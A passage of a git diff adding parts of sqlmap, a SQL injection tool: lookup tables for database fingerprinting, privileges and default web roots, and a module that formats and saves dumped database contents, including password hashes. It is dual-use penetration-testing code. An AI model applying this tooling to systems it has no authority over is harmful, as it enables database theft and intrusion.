"sysname", + 25: "nvarchar", + 1: "char", + 24: "nchar", + 4: "varbinary", + 80: "timestamp", + 3: "binary", + 19: "text", + 20: "image", +} + +ALTIBASE_TYPES = { + 1: "CHAR", + 12: "VARCHAR", + -8: "NCHAR", + -9: "NVARCHAR", + 2: "NUMERIC", + 6: "FLOAT", + 8: "DOUBLE", + 7: "REAL", + -5: "BIGINT", + 4: "INTEGER", + 5: "SMALLINT", + 9: "DATE", + 30: "BLOB", + 40: "CLOB", + 20001: "BYTE", + 20002: "NIBBLE", + -7: "BIT", + -100: "VARBIT", + 10003: "GEOMETRY", +} + +MYSQL_PRIVS = { + 1: "select_priv", + 2: "insert_priv", + 3: "update_priv", + 4: "delete_priv", + 5: "create_priv", + 6: "drop_priv", + 7: "reload_priv", + 8: "shutdown_priv", + 9: "process_priv", + 10: "file_priv", + 11: "grant_priv", + 12: "references_priv", + 13: "index_priv", + 14: "alter_priv", + 15: "show_db_priv", + 16: "super_priv", + 17: "create_tmp_table_priv", + 18: "lock_tables_priv", + 19: "execute_priv", + 20: "repl_slave_priv", + 21: "repl_client_priv", + 22: "create_view_priv", + 23: "show_view_priv", + 24: "create_routine_priv", + 25: "alter_routine_priv", + 26: "create_user_priv", +} + +PGSQL_PRIVS = { + 1: "createdb", + 2: "super", + 3: "catupd", +} + +# Reference(s): http://stackoverflow.com/a/17672504 +# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES + +FIREBIRD_PRIVS = { + "S": "SELECT", + "I": "INSERT", + "U": "UPDATE", + "D": "DELETE", + "R": "REFERENCE", + "X": "EXECUTE", + "A": "ALL", + "M": "MEMBER", + "T": "DECRYPT", + "E": "ENCRYPT", + "B": "SUBSCRIBE", +} + +# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm +# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm + +INFORMIX_PRIVS = { + "D": "DBA (all privileges)", + "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)", + "C": "CONNECT (work with existing tables)", + "G": "ROLE", + "U": "DEFAULT (implicit connection)", +} + +DB2_PRIVS = { + 1: "CONTROLAUTH", + 2: "ALTERAUTH", + 3: "DELETEAUTH", + 4: "INDEXAUTH", + 5: "INSERTAUTH", + 6: "REFAUTH", + 7: "SELECTAUTH", + 8: "UPDATEAUTH", +} + +DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} + +DBMS_DICT = { + DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"), + DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"), + DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), + DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "https://oracle.github.io/python-cx_Oracle/", "oracle"), + DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/3/library/sqlite3.html", "sqlite"), + DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"), + DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), + DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), + DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), + DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None), + DBMS.H2: (H2_ALIASES, None, None, None), + DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.MONETDB: (MONETDB_ALIASES, "pymonetdb", "https://github.com/gijzelaerr/pymonetdb", "monetdb"), + DBMS.DERBY: (DERBY_ALIASES, "pydrda", "https://github.com/nakagami/pydrda/", None), + DBMS.VERTICA: (VERTICA_ALIASES, "vertica-python", "https://github.com/vertica/vertica-python", "vertica+vertica_python"), + DBMS.MCKOI: (MCKOI_ALIASES, None, None, None), + DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None), + DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None), + DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None), + DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None), + DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), + DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None), + DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None), + DBMS.EXTREMEDB: (EXTREMEDB_ALIASES, None, None, None), + DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None), + DBMS.RAIMA: (RAIMA_ALIASES, None, None, None), + DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None), +} + +# Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/ +FROM_DUMMY_TABLE = { + DBMS.ORACLE: " FROM DUAL", + DBMS.ACCESS: " FROM MSysAccessObjects", + DBMS.FIREBIRD: " FROM RDB$DATABASE", + DBMS.MAXDB: " FROM VERSIONS", + DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", + DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS", + DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL", + DBMS.DERBY: " FROM SYSIBM.SYSDUMMY1", + DBMS.MIMERSQL: " FROM SYSTEM.ONEROW", + DBMS.FRONTBASE: " FROM INFORMATION_SCHEMA.IO_STATISTICS" +} + +HEURISTIC_NULL_EVAL = { + DBMS.ACCESS: "CVAR(NULL)", + DBMS.MAXDB: "ALPHA(NULL)", + DBMS.MSSQL: "DIFFERENCE(NULL,NULL)", + DBMS.MYSQL: "QUARTER(NULL XOR NULL)", + DBMS.ORACLE: "INSTR2(NULL,NULL)", + DBMS.PGSQL: "QUOTE_IDENT(NULL)", + DBMS.SQLITE: "UNLIKELY(NULL)", + DBMS.H2: "STRINGTOUTF8(NULL)", + DBMS.MONETDB: "CODE(NULL)", + DBMS.DERBY: "NULLIF(USER,SESSION_USER)", + DBMS.VERTICA: "BITSTRING_TO_BINARY(NULL)", + DBMS.MCKOI: "TONUMBER(NULL)", + DBMS.PRESTO: "FROM_HEX(NULL)", + DBMS.ALTIBASE: "TDESENCRYPT(NULL,NULL)", + DBMS.MIMERSQL: "ASCII_CHAR(256)", + DBMS.CRATEDB: "MD5(NULL~NULL)", # Note: NULL~NULL also being evaluated on H2 and Ignite + DBMS.CUBRID: "(NULL SETEQ NULL)", + DBMS.CACHE: "%SQLUPPER NULL", + DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))", + DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))", + DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)", + DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL", +} + +SQL_STATEMENTS = { + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", + ), + + "SQL data definition": ( + "create ", + "declare ", + "drop ", + "truncate ", + "alter ", + ), + + "SQL data manipulation": ( + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "load ", + ), + + "SQL data control": ( + "grant ", + "revoke ", + ), + + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", + ), + + "SQL transaction": ( + "start transaction ", + "begin work ", + "begin transaction ", + "commit ", + "rollback ", + ), + + "SQL administration": ( + "set ", + ), +} + +POST_HINT_CONTENT_TYPES = { + POST_HINT.JSON: "application/json", + POST_HINT.JSON_LIKE: "application/json", + POST_HINT.MULTIPART: "multipart/form-data", + POST_HINT.SOAP: "application/soap+xml", + POST_HINT.XML: "application/xml", + POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", +} + +OBSOLETE_OPTIONS = { + "--replicate": "use '--dump-format=SQLITE' instead", + "--no-unescape": "use '--no-escape' instead", + "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", + "--ignore-401": "use '--ignore-code' instead", + "--second-order": "use '--second-url' instead", + "--purge-output": "use '--purge' instead", + "--sqlmap-shell": "use '--shell' instead", + "--check-payload": None, + "--check-waf": None, + "--pickled-options": "use '--api -c ...' instead", + "--identify-waf": "functionality being done automatically", +} + +DEPRECATED_OPTIONS = { +} + +DUMP_DATA_PREPROCESS = { + DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 + DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, +} + +DEFAULT_DOC_ROOTS = { + OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"), + OS.LINUX: ("/var/www/", "/var/www/html", "/var/www/htdocs", "/usr/local/apache2/htdocs", "/usr/local/www/data", "/var/apache2/htdocs", "/var/www/nginx-default", "/srv/www/htdocs", "/usr/local/var/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout +} + +PART_RUN_CONTENT_TYPES = { + "checkDbms": CONTENT_TYPE.TECHNIQUES, + "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, + "getBanner": CONTENT_TYPE.BANNER, + "getCurrentUser": CONTENT_TYPE.CURRENT_USER, + "getCurrentDb": CONTENT_TYPE.CURRENT_DB, + "getHostname": CONTENT_TYPE.HOSTNAME, + "isDba": CONTENT_TYPE.IS_DBA, + "getUsers": CONTENT_TYPE.USERS, + "getPasswordHashes": CONTENT_TYPE.PASSWORDS, + "getPrivileges": CONTENT_TYPE.PRIVILEGES, + "getRoles": CONTENT_TYPE.ROLES, + "getDbs": CONTENT_TYPE.DBS, + "getTables": CONTENT_TYPE.TABLES, + "getColumns": CONTENT_TYPE.COLUMNS, + "getSchema": CONTENT_TYPE.SCHEMA, + "getCount": CONTENT_TYPE.COUNT, + "dumpTable": CONTENT_TYPE.DUMP_TABLE, + "search": CONTENT_TYPE.SEARCH, + "sqlQuery": CONTENT_TYPE.SQL_QUERY, + "tableExists": CONTENT_TYPE.COMMON_TABLES, + "columnExists": CONTENT_TYPE.COMMON_COLUMNS, + "readFile": CONTENT_TYPE.FILE_READ, + "writeFile": CONTENT_TYPE.FILE_WRITE, + "osCmd": CONTENT_TYPE.OS_CMD, + "regRead": CONTENT_TYPE.REG_READ +} + +# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html + +HTML_ENTITIES = { + "quot": 34, + "amp": 38, + "apos": 39, + "lt": 60, + "gt": 62, + "nbsp": 160, + "iexcl": 161, + "cent": 162, + "pound": 163, + "curren": 164, + "yen": 165, + "brvbar": 166, + "sect": 167, + "uml": 168, + "copy": 169, + "ordf": 170, + "laquo": 171, + "not": 172, + "shy": 173, + "reg": 174, + "macr": 175, + "deg": 176, + "plusmn": 177, + "sup2": 178, + "sup3": 179, + "acute": 180, + "micro": 181, + "para": 182, + "middot": 183, + "cedil": 184, + "sup1": 185, + "ordm": 186, + "raquo": 187, + "frac14": 188, + "frac12": 189, + "frac34": 190, + "iquest": 191, + "Agrave": 192, + "Aacute": 193, + "Acirc": 194, + "Atilde": 195, + "Auml": 196, + "Aring": 197, + "AElig": 198, + "Ccedil": 199, + "Egrave": 200, + "Eacute": 201, + "Ecirc": 202, + "Euml": 203, + "Igrave": 204, + "Iacute": 205, + "Icirc": 206, + "Iuml": 207, + "ETH": 208, + "Ntilde": 209, + "Ograve": 210, + "Oacute": 211, + "Ocirc": 212, + "Otilde": 213, + "Ouml": 214, + "times": 215, + "Oslash": 216, + "Ugrave": 217, + "Uacute": 218, + "Ucirc": 219, + "Uuml": 220, + "Yacute": 221, + "THORN": 222, + "szlig": 223, + "agrave": 224, + "aacute": 225, + "acirc": 226, + "atilde": 227, + "auml": 228, + "aring": 229, + "aelig": 230, + "ccedil": 231, + "egrave": 232, + "eacute": 233, + "ecirc": 234, + "euml": 235, + "igrave": 236, + "iacute": 237, + "icirc": 238, + "iuml": 239, + "eth": 240, + "ntilde": 241, + "ograve": 242, + "oacute": 243, + "ocirc": 244, + "otilde": 245, + "ouml": 246, + "divide": 247, + "oslash": 248, + "ugrave": 249, + "uacute": 250, + "ucirc": 251, + "uuml": 252, + "yacute": 253, + "thorn": 254, + "yuml": 255, + "OElig": 338, + "oelig": 339, + "Scaron": 352, + "fnof": 402, + "scaron": 353, + "Yuml": 376, + "circ": 710, + "tilde": 732, + "Alpha": 913, + "Beta": 914, + "Gamma": 915, + "Delta": 916, + "Epsilon": 917, + "Zeta": 918, + "Eta": 919, + "Theta": 920, + "Iota": 921, + "Kappa": 922, + "Lambda": 923, + "Mu": 924, + "Nu": 925, + "Xi": 926, + "Omicron": 927, + "Pi": 928, + "Rho": 929, + "Sigma": 931, + "Tau": 932, + "Upsilon": 933, + "Phi": 934, + "Chi": 935, + "Psi": 936, + "Omega": 937, + "alpha": 945, + "beta": 946, + "gamma": 947, + "delta": 948, + "epsilon": 949, + "zeta": 950, + "eta": 951, + "theta": 952, + "iota": 953, + "kappa": 954, + "lambda": 955, + "mu": 956, + "nu": 957, + "xi": 958, + "omicron": 959, + "pi": 960, + "rho": 961, + "sigmaf": 962, + "sigma": 963, + "tau": 964, + "upsilon": 965, + "phi": 966, + "chi": 967, + "psi": 968, + "omega": 969, + "thetasym": 977, + "upsih": 978, + "piv": 982, + "bull": 8226, + "hellip": 8230, + "prime": 8242, + "Prime": 8243, + "oline": 8254, + "frasl": 8260, + "ensp": 8194, + "emsp": 8195, + "thinsp": 8201, + "zwnj": 8204, + "zwj": 8205, + "lrm": 8206, + "rlm": 8207, + "ndash": 8211, + "mdash": 8212, + "lsquo": 8216, + "rsquo": 8217, + "sbquo": 8218, + "ldquo": 8220, + "rdquo": 8221, + "bdquo": 8222, + "dagger": 8224, + "Dagger": 8225, + "permil": 8240, + "lsaquo": 8249, + "rsaquo": 8250, + "euro": 8364, + "weierp": 8472, + "image": 8465, + "real": 8476, + "trade": 8482, + "alefsym": 8501, + "larr": 8592, + "uarr": 8593, + "rarr": 8594, + "darr": 8595, + "harr": 8596, + "crarr": 8629, + "lArr": 8656, + "uArr": 8657, + "rArr": 8658, + "dArr": 8659, + "hArr": 8660, + "forall": 8704, + "part": 8706, + "exist": 8707, + "empty": 8709, + "nabla": 8711, + "isin": 8712, + "notin": 8713, + "ni": 8715, + "prod": 8719, + "sum": 8721, + "minus": 8722, + "lowast": 8727, + "radic": 8730, + "prop": 8733, + "infin": 8734, + "ang": 8736, + "and": 8743, + "or": 8744, + "cap": 8745, + "cup": 8746, + "int": 8747, + "there4": 8756, + "sim": 8764, + "cong": 8773, + "asymp": 8776, + "ne": 8800, + "equiv": 8801, + "le": 8804, + "ge": 8805, + "sub": 8834, + "sup": 8835, + "nsub": 8836, + "sube": 8838, + "supe": 8839, + "oplus": 8853, + "otimes": 8855, + "perp": 8869, + "sdot": 8901, + "lceil": 8968, + "rceil": 8969, + "lfloor": 8970, + "rfloor": 8971, + "lang": 9001, + "rang": 9002, + "loz": 9674, + "spades": 9824, + "clubs": 9827, + "hearts": 9829, + "diams": 9830 +} diff --git a/src/sqlmap-master/lib/core/dump.py b/src/sqlmap-master/lib/core/dump.py new file mode 100644 index 0000000..42f713e --- /dev/null +++ b/src/sqlmap-master/lib/core/dump.py @@ -0,0 +1,721 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import hashlib +import os +import re +import shutil +import tempfile +import threading + +from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import dataToDumpFile +from lib.core.common import dataToStdout +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import normalizeUnicode +from lib.core.common import openFile +from lib.core.common import prioritySortColumns +from lib.core.common import randomInt +from lib.core.common import safeCSValue +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange +from lib.core.convert import getBytes +from lib.core.convert import getConsoleLength +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.convert import htmlEscape +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.dicts import DUMP_REPLACEMENTS +from lib.core.enums import CONTENT_STATUS +from lib.core.enums import CONTENT_TYPE +from lib.core.enums import DBMS +from lib.core.enums import DUMP_FORMAT +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapSystemException +from lib.core.exception import SqlmapValueException +from lib.core.replication import Replication +from lib.core.settings import DUMP_FILE_BUFFER_SIZE +from lib.core.settings import HTML_DUMP_CSS_STYLE +from lib.core.settings import IS_WIN +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE +from lib.core.settings import TRIM_STDOUT_DUMP_SIZE +from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT +from lib.core.settings import VERSION_STRING +from lib.core.settings import WINDOWS_RESERVED_NAMES +from lib.utils.safe2bin import safechardecode +from thirdparty import six +from thirdparty.magic import magic + +class Dump(object): + """ + This class defines methods used to parse and output the results + of SQL injection actions + """ + + def __init__(self): + self._outputFile = None + self._outputFP = None + self._lock = threading.Lock() + + def _write(self, data, newline=True, console=True, content_type=None): + text = "%s%s" % (data, "\n" if newline else " ") + + if conf.api: + dataToStdout(data, contentType=content_type, status=CONTENT_STATUS.COMPLETE) + + elif console: + dataToStdout(text) + + if self._outputFP: + multiThreadMode = kb.multiThreadMode + if multiThreadMode: + self._lock.acquire() + + try: + self._outputFP.write(text) + except IOError as ex: + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + + if multiThreadMode: + self._lock.release() + + kb.dataOutputFlag = True + + def flush(self): + if self._outputFP: + try: + self._outputFP.flush() + except IOError: + pass + + def setOutputFile(self): + if conf.noLogging: + self._outputFP = None + return + + self._outputFile = os.path.join(conf.outputPath, "log") + try: + self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") + except IOError as ex: + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + + def singleString(self, data, content_type=None): + self._write(data, content_type=content_type) + + def string(self, header, data, content_type=None, sort=True): + if conf.api: + self._write(data, content_type=content_type) + + if isListLike(data) and len(data) == 1: + data = unArrayizeValue(data) + + if isListLike(data): + self.lister(header, data, content_type, sort) + elif data is not None: + _ = getUnicode(data) + + if _.endswith("\r\n"): + _ = _[:-2] + + elif _.endswith("\n"): + _ = _[:-1] + + if _.strip(' '): + _ = _.strip(' ') + + if "\n" in _: + self._write("%s:\n---\n%s\n---" % (header, _)) + else: + self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, six.string_types) else _)) + + def lister(self, header, elements, content_type=None, sort=True): + if elements and sort: + try: + elements = set(elements) + elements = list(elements) + elements.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) + except: + pass + + if conf.api: + self._write(elements, content_type=content_type) + + if elements: + self._write("%s [%d]:" % (header, len(elements))) + + for element in elements: + if isinstance(element, six.string_types): + self._write("[*] %s" % element) + elif isListLike(element): + self._write("[*] " + ", ".join(getUnicode(e) for e in element)) + + if elements: + self._write("") + + def banner(self, data): + self.string("banner", data, content_type=CONTENT_TYPE.BANNER) + + def currentUser(self, data): + self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER) + + def currentDb(self, data): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE): + self.string("current database (equivalent to schema on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.DB2, DBMS.MIMERSQL, DBMS.MAXDB, DBMS.VIRTUOSO): + self.string("current database (equivalent to owner on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) + else: + self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) + + def hostname(self, data): + self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME) + + def dba(self, data): + self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA) + + def users(self, users): + self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS) + + def statements(self, statements): + self.lister("SQL statements", statements, content_type=CONTENT_TYPE.STATEMENTS) + + def userSettings(self, header, userSettings, subHeader, content_type=None): + self._areAdmins = set() + + if isinstance(userSettings, (tuple, list, set)): + self._areAdmins = userSettings[1] + userSettings = userSettings[0] + + users = [_ for _ in userSettings.keys() if _ is not None] + users.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) + + if conf.api: + self._write(userSettings, content_type=content_type) + + if userSettings: + self._write("%s:" % header) + + for user in users: + settings = filterNone(userSettings[user]) + + if isNoneValue(settings): + stringSettings = "" + else: + stringSettings = " [%d]:" % len(settings) + + if user in self._areAdmins: + self._write("[*] %s (administrator)%s" % (user, stringSettings)) + else: + self._write("[*] %s%s" % (user, stringSettings)) + + if settings: + settings.sort() + + for setting in settings: + self._write(" %s: %s" % (subHeader, setting)) + + if userSettings: + self.singleString("") + + def dbs(self, dbs): + self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS) + + def dbTables(self, dbTables): + if isinstance(dbTables, dict) and len(dbTables) > 0: + if conf.api: + self._write(dbTables, content_type=CONTENT_TYPE.TABLES) + + maxlength = 0 + + for tables in dbTables.values(): + for table in tables: + if table and isListLike(table): + table = table[0] + + maxlength = max(maxlength, getConsoleLength(unsafeSQLIdentificatorNaming(getUnicode(table)))) + + lines = "-" * (int(maxlength) + 2) + + for db, tables in dbTables.items(): + tables = sorted(filter(None, tables)) + + self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "") + + if len(tables) == 1: + self._write("[1 table]") + else: + self._write("[%d tables]" % len(tables)) + + self._write("+%s+" % lines) + + for table in tables: + if table and isListLike(table): + table = table[0] + + table = unsafeSQLIdentificatorNaming(table) + blank = " " * (maxlength - getConsoleLength(getUnicode(table))) + self._write("| %s%s |" % (table, blank)) + + self._write("+%s+\n" % lines) + elif dbTables is None or len(dbTables) == 0: + self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES) + else: + self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES) + + def dbTableColumns(self, tableColumns, content_type=None): + if isinstance(tableColumns, dict) and len(tableColumns) > 0: + if conf.api: + self._write(tableColumns, content_type=content_type) + + for db, tables in tableColumns.items(): + if not db: + db = "All" + + for table, columns in tables.items(): + maxlength1 = 0 + maxlength2 = 0 + + colType = None + + colList = list(columns.keys()) + colList.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) + + for column in colList: + colType = columns[column] + + column = unsafeSQLIdentificatorNaming(column) + maxlength1 = max(maxlength1, len(column or "")) + maxlength2 = max(maxlength2, len(colType or "")) + + maxlength1 = max(maxlength1, len("COLUMN")) + lines1 = "-" * (maxlength1 + 2) + + if colType is not None: + maxlength2 = max(maxlength2, len("TYPE")) + lines2 = "-" * (maxlength2 + 2) + + self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "", unsafeSQLIdentificatorNaming(table))) + + if len(columns) == 1: + self._write("[1 column]") + else: + self._write("[%d columns]" % len(columns)) + + if colType is not None: + self._write("+%s+%s+" % (lines1, lines2)) + else: + self._write("+%s+" % lines1) + + blank1 = " " * (maxlength1 - len("COLUMN")) + + if colType is not None: + blank2 = " " * (maxlength2 - len("TYPE")) + + if colType is not None: + self._write("| Column%s | Type%s |" % (blank1, blank2)) + self._write("+%s+%s+" % (lines1, lines2)) + else: + self._write("| Column%s |" % blank1) + self._write("+%s+" % lines1) + + for column in colList: + colType = columns[column] + + column = unsafeSQLIdentificatorNaming(column) + blank1 = " " * (maxlength1 - len(column)) + + if colType is not None: + blank2 = " " * (maxlength2 - len(colType)) + self._write("| %s%s | %s%s |" % (column, blank1, colType, blank2)) + else: + self._write("| %s%s |" % (column, blank1)) + + if colType is not None: + self._write("+%s+%s+\n" % (lines1, lines2)) + else: + self._write("+%s+\n" % lines1) + + def dbTablesCount(self, dbTables): + if isinstance(dbTables, dict) and len(dbTables) > 0: + if conf.api: + self._write(dbTables, content_type=CONTENT_TYPE.COUNT) + + maxlength1 = len("Table") + maxlength2 = len("Entries") + + for ctables in dbTables.values(): + for tables in ctables.values(): + for table in tables: + maxlength1 = max(maxlength1, getConsoleLength(getUnicode(table))) + + for db, counts in dbTables.items(): + self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "") + + lines1 = "-" * (maxlength1 + 2) + blank1 = " " * (maxlength1 - len("Table")) + lines2 = "-" * (maxlength2 + 2) + blank2 = " " * (maxlength2 - len("Entries")) + + self._write("+%s+%s+" % (lines1, lines2)) + self._write("| Table%s | Entries%s |" % (blank1, blank2)) + self._write("+%s+%s+" % (lines1, lines2)) + + sortedCounts = list(counts.keys()) + sortedCounts.sort(reverse=True) + + for count in sortedCounts: + tables = counts[count] + + if count is None: + count = "Unknown" + + tables.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) + + for table in tables: + blank1 = " " * (maxlength1 - getConsoleLength(getUnicode(table))) + blank2 = " " * (maxlength2 - len(str(count))) + self._write("| %s%s | %d%s |" % (table, blank1, count, blank2)) + + self._write("+%s+%s+\n" % (lines1, lines2)) + else: + logger.error("unable to retrieve the number of entries for any table") + + def dbTableValues(self, tableValues): + replication = None + rtable = None + dumpFP = None + appendToFile = False + warnFile = False + + if tableValues is None: + return + + db = tableValues["__infos__"]["db"] + if not db: + db = "All" + table = tableValues["__infos__"]["table"] + + if conf.api: + self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) + + try: + dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + except UnicodeError: + try: + dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db))) + except (UnicodeError, OSError): + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "currently unable to use regular dump directory. " + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir + + if conf.dumpFormat == DUMP_FORMAT.SQLITE: + replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) + elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): + if not os.path.isdir(dumpDbPath): + try: + os.makedirs(dumpDbPath) + except: + warnFile = True + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)) + dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8])) + + if not os.path.isdir(dumpDbPath): + try: + os.makedirs(dumpDbPath) + except Exception as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir + + dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) + if not checkFile(dumpFileName, False): + try: + openFile(dumpFileName, "w+b").close() + except SqlmapSystemException: + raise + except: + warnFile = True + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)) + dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower())) + else: + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) + else: + appendToFile = any((conf.limitStart, conf.limitStop)) + + if not appendToFile: + count = 1 + while True: + candidate = "%s.%d" % (dumpFileName, count) + if not checkFile(candidate, False): + try: + shutil.copyfile(dumpFileName, candidate) + except IOError: + pass + break + else: + count += 1 + + dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE) + + count = int(tableValues["__infos__"]["count"]) + separator = str() + field = 